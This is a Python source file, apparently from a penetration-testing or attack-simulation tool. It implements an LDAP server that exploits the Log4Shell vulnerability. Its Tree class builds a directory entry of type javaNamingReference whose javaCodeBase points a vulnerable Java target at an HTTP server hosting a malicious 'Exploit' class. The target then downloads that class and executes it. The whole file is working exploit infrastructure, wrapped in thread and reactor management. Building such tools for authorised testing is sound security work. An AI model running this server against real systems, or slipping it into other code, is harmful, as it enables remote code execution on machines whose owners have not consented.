import logging
import math
import tempfile
import time
from pathlib import Path
from threading import Event, Thread, current_thread
from typing import Optional

from ldaptor.protocols.ldap.ldapserver import LDAPServer
from twisted.internet import reactor
from twisted.internet.protocol import ServerFactory

from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.utils.code_utils import insecure_generate_random_string

# WARNING: It was observed that this LDAP server would raise an exception and fail to start if
#          multiple Python threads attempt to start multiple LDAP servers simultaneously. It was
#          thought that since each LDAP server is started in its own process, there would be no
#          issue, however this is not the case. It seems that there may be something that is not
#          thread- or multiprocess-safe about some of the twisted imports. Moving the twisted
#          imports down into the functions where they are required and removing them from the top of
#          this file appears to resolve the issue.

logger = logging.getLogger(__name__)

EXPLOIT_RDN = "dn=Exploit"
REACTOR_START_TIMEOUT_SEC = 30.0


class LDAPServerStartError(Exception):
    pass


class Tree:
    """
    An LDAP directory information tree (DIT) used to exploit log4shell
    Adapted from: https://ldaptor.readthedocs.io/en/latest/cookbook/servers.html
    """

    def __init__(self, http_server_ip: str, http_server_port: int, storage_dir: Path):
        from ldaptor.ldiftree import LDIFTreeEntry

        self.path = tempfile.mkdtemp(prefix="log4shell", suffix=".ldap", dir=storage_dir)
        self.db = LDIFTreeEntry(self.path)

        self._init_db(http_server_ip, http_server_port)

    def _init_db(self, http_server_ip: str, http_server_port: int):
        attributes = {
            "javaFactory": ["Exploit"],
            "objectClass": ["javaNamingReference"],
            "javaCodeBase": [f"http://{http_server_ip}:{http_server_port}/"],
            "javaClassName": ["Exploit"],
        }

        self.db.addChild(EXPLOIT_RDN, attributes)


class LDAPServerFactory(ServerFactory):
    """
    Our Factory is meant to persistently store the ldap tree
    Adapted from: https://ldaptor.readthedocs.io/en/latest/cookbook/servers.html
    """

    protocol = LDAPServer

    def __init__(self, root):
        self.root = root

    def buildProtocol(self, addr):
        proto = self.protocol()
        proto.debug = self.debug
        proto.factory = self
        return proto


class LDAPExploitServer:
    """
    This class wraps the creation of an Ldaptor LDAP server that is used to exploit log4shell.
    Adapted from: https://ldaptor.readthedocs.io/en/latest/cookbook/servers.html
    """

    def __init__(
        self, ldap_server_port: int, http_server_ip: str, http_server_port: int, storage_dir: Path
    ):
        """
        :param ldap_server_port: The port that the LDAP server will listen on.

        :param http_server_ip: The IP address of the HTTP server that serves the malicious Log4Shell
                               Java class.

        :param http_server_port: The port the HTTP server is listening on.

        :param storage_dir: A directory where the LDAP server can safely store files it needs during
                            runtime.
        """

        self._reactor_startup_completed = Event()
        self._ldap_server_port = ldap_server_port
        self._http_server_ip = http_server_ip
        self._http_server_port = http_server_port
        self._storage_dir = storage_dir
        self._server_thread = None

    def run(self):
        """
        Runs the Log4Shell LDAP exploit server in a thread. This method attempts to start the
        server and blocks until either the server has successfully started or it times out.

        :raises LDAPServerStartError: Indicates there was a problem starting the LDAP server.
        """
        logger.info("Starting LDAP exploit server")

        # A Twisted reactor can only be started and stopped once. It cannot be restarted after it
        # has been stopped. To work around this, the reactor is configured and run in a separate
        # process. This allows us to run multiple LDAP servers sequentially or simultaneously and
        # stop each one when we're done with it.
        # UPDATE: Running the server in a separate process is no longer needed now that
        # the Log4Shell exploiter is a plugin. Plugins run in their own processes.
        self._server_thread = Thread(  # type: ignore[assignment]
            name=f"{current_thread().name}-LDAPServer-{insecure_generate_random_string(n=8)}",
            target=self._run_twisted_reactor,
            daemon=True,
        )

        self._server_thread.start()  # type: ignore[attr-defined]
        reactor_running = self._reactor_startup_completed.wait(REACTOR_START_TIMEOUT_SEC)

        if not reactor_running:
            logger.error("The LDAP server failed to start, stopping the server thread...")
            self.stop(timeout=LONG_REQUEST_TIMEOUT)
            raise LDAPServerStartError("An unknown error prevented the LDAP server from starting")

        logger.debug("The LDAP exploit server has successfully started")

    def _run_twisted_reactor(self):
        # TODO: Try importing reactor at top level when Log4Shell is plugin

        logger.debug(f"Starting log4shell LDAP server on port {self._ldap_server_port}")
        self._configure_twisted_reactor()

        # Since the call to reactor.run() blocks, a separate thread is started to poll the value
        # of `reactor.running` and set the self._reactor_startup_complete Event when the reactor
        # is running. This allows the self.run() function to block until the reactor has
        # successfully started.
        Thread(target=self._check_if_reactor_startup_completed, daemon=True).start()
        reactor.run(installSignalHandlers=False)
        logger.debug("Control returned from twisted to LDAPExploitServer")
        logger.debug("Exiting twisted process")

    def _check_if_reactor_startup_completed(self):
        check_interval_sec = 0.25
        num_checks = math.ceil(REACTOR_START_TIMEOUT_SEC / check_interval_sec)

        for _ in range(0, num_checks):
            if reactor.running:
                logger.debug("Twisted reactor startup completed")
                self._reactor_startup_completed.set()
                break

            logger.debug("Twisted reactor has not yet started")
            time.sleep(check_interval_sec)

    def _configure_twisted_reactor(self):
        from ldaptor.interfaces import IConnectedLDAPEntry
        from twisted.application import service
        from twisted.python.components import registerAdapter

        LDAPExploitServer._output_twisted_logs_to_python_logger()

        registerAdapter(lambda x: x.root, LDAPServerFactory, IConnectedLDAPEntry)

        tree = Tree(self._http_server_ip, self._http_server_port, self._storage_dir)
        factory = LDAPServerFactory(tree.db)
        factory.debug = True

        application = service.Application("ldaptor-server")
        service.IServiceCollection(application)
        reactor.listenTCP(self._ldap_server_port, factory)

    @staticmethod
    def _output_twisted_logs_to_python_logger():
        from twisted.python import log

        # Configures Twisted to output its logs using the standard python logging module instead of
        # the Twisted logging module.
        # https://twistedmatrix.com/documents/current/api/twisted.python.log.PythonLoggingObserver.html
        log_observer = log.PythonLoggingObserver()
        log_observer.start()

    def stop(self, timeout: Optional[float] = None):
        """
        Stops the LDAP server.

        :param timeout: A floating point number of seconds to wait for the server to stop. If this
                        argument is None (the default), the method blocks until the LDAP server
                        terminates. If `timeout` is a positive floating point number, this method
                        blocks for at most `timeout` seconds.
        """
        if self._server_thread is None:
            return

        if self._server_thread.is_alive():
            logger.debug("Stopping LDAP exploit server")

            reactor.callFromThread(reactor.stop)
            self._server_thread.join(timeout)

            if self._server_thread.is_alive():
                logger.warning(
                    "Timed out while waiting for the LDAP exploit server to stop, "
                    "it will stop when the parent process terminates"
                )
            else:
                logger.debug("Successfully stopped the LDAP exploit server")
